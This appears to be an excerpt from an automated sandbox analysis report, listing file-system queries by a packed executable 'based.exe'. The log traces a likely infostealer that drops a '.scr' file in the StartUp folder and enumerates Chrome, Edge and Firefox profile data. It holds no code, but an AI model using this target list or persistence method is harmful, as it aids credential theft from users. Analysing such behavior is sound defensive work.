                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_lzma.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_sqlite3.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_socket.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\select.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_ssl.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_hashlib.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_queue.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\unicodedata.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
